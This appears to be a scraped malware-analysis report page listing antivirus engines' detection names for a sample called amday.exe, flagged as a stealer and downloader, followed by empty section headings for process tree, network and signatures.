Symantec	ML.Attribute.HighConfidence
Elastic	malicious (high confidence)
ESET-NOD32	a variant of MSIL/Kryptik.AJHU
APEX	Malicious
Kaspersky	HEUR:Trojan-Spy.MSIL.Stealer.gen
Alibaba	TrojanSpy:MSIL/Stealer.063b7124
NANO-Antivirus	Trojan.Win32.Stealer.jytwyo
Rising	Malware.Obfus/MSIL@AI.100 (RDM.MSIL2:l4f2PRbJepCE3V52t/eFCA)
Emsisoft	Trojan.GenericKD.68503414 (B)
F-Secure	Trojan.TR/Dropper.MSIL.piakc
DrWeb	Trojan.DownLoader45.64810
Zillya	Trojan.Stealer.Win32.131112
TrendMicro	Trojan.Win32.AMADEY.YXDHDZ
McAfee-GW-Edition	Artemis!Trojan
Sophos	Mal/Generic-S
Ikarus	MSIL.Malware.Injector
GData	Trojan.GenericKD.68503414
Avira	TR/Dropper.MSIL.piakc
MAX	malware (ai score=81)
Antiy-AVL	Trojan/MSIL.Kryptik
Gridinsoft	Ransom.Win32.Wacatac.cl
Xcitium	Malware@#5dn0dtt0gjxh
Arcabit	Trojan.Generic.D4154776
ZoneAlarm	HEUR:Trojan-Spy.MSIL.Stealer.gen
Microsoft	Trojan:MSIL/LummaStealer.B!MTB
Google	Detected
AhnLab-V3	Downloader/Win.StealWallet.R596060
BitDefenderTheta	Gen:NN.ZemsilF.36662.tt0@aqmTpNji
ALYac	Trojan.GenericKD.68503414
DeepInstinct	MALICIOUS
Cylance	unsafe
Panda	Trj/Chgt.AD
TrendMicro-HouseCall	Trojan.Win32.AMADEY.YXDHDZ
Tencent	Malware.Win32.Gencirc.13ebb1a2
SentinelOne	Static AI - Malicious PE
MaxSecure	Trojan.Malware.73709669.susgen
Fortinet	MSIL/Kryptik.AJDX!tr

amday.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All